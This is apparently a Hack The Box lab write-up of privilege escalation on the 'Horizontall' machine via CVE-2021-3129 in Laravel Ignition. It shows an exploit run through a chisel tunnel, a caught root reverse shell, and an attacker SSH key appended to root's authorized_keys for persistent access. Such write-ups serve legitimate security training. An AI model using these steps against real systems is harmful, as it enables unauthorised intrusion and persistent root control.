InfoSec LAB

Horizontall_Privilege_Escalation

Created: 4 min read

CVE-2021-3129

a vulnerability was found in ignition up to 2.5.1. It has been declared as critical. facade/ignition is an error page for Laravel apps. This vulnerability affects the function file_get_contents/file_put_contents of the component Debug Mode. This is only exploitable on sites using debug mode with Laravel before 8.4.2.

the vulnerability was originally discovered by ambionics security, and they have put together a [[#Exploit|PoC exploit package]] below

exploit

The exploit itself requires a [[Horizontall_payload#PHPGGC: PHP Generic Gadget Chains|special PHP payload generator]], which was also created by the ambionics security

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ python3 laravel_rce.py http://127.0.0.1:800/ payload.phar      
+ log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !

Launching the exploit with the generated PHAR payload

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ nnc 1234   
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.105] 49026
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# hostname
horizontall
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.105  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:8e92  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:8e92  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:8e:92  txqueuelen 1000  (Ethernet)
        RX packets 3105208  bytes 596740294 (596.7 MB)
        RX errors 0  dropped 149  overruns 0  frame 0
        TX packets 3094233  bytes 1404657384 (1.4 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8881400  bytes 1103573833 (1.1 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8881400  bytes 1103573833 (1.1 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

I got the shell session open. Interestingly, the process was running as the root user, NOT the developer user While this appears to be the end, the connection gets cut off immediately.

Additionally, my chisel tunnel process was killed

I would need to be quick

SSH

strapi@horizontall:/dev/shm$ ./chiselx64 client 10.10.14.7:55555 R:800:127.0.0.1:8000
2023/04/13 20:59:19 client: Connecting to ws://10.10.14.7:55555
2023/04/13 20:59:19 client: Connected (Latency 94.772566ms)

I first re-established the tunnel

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ python3 laravel_rce.py http://127.0.0.1:800/ payload.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !

Launched the exploit again

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.105] 49062
script /dev/null -c bash
Script started, file is /dev/null
root@horizontall:/home/developer/myproject/public# echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> /root/.ssh/authorized_keys
<V7fooImm5g kali@kali' >> /root/.ssh/authorized_keys

Upon getting a shell session open, I spawned a PTY session and wrote my public SSH key to the authorized_keys file of the root user The shell session was cutoff immediately as expected, but that doesn’t matter anymore.

Now, I can just SSH into the target system as the root user using my very own SSH key

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ ssh root@horizontall.htb -i ~/.ssh/id_ed25519 
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Thu Apr 13 21:00:24 UTC 2023
 
  System load:  0.0               Processes:           193
  Usage of /:   90.0% of 4.85GB   Users logged in:     0
  Memory usage: 49%               IP address for eth0: 10.10.11.105
  Swap usage:   0%
 
  => / is using 90.0% of 4.85GB
 
 
0 updates can be applied immediately.
 
 
Last login: Mon Aug 23 11:27:49 2021 from 10.10.14.6
root@horizontall:~# whoami
root
root@horizontall:~# hostname
horizontall
root@horizontall:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.105  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:8e92  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:8e92  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:8e:92  txqueuelen 1000  (Ethernet)
        RX packets 3107512  bytes 596946706 (596.9 MB)
        RX errors 0  dropped 167  overruns 0  frame 0
        TX packets 3096951  bytes 1408442412 (1.4 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8881714  bytes 1107158126 (1.1 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8881714  bytes 1107158126 (1.1 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks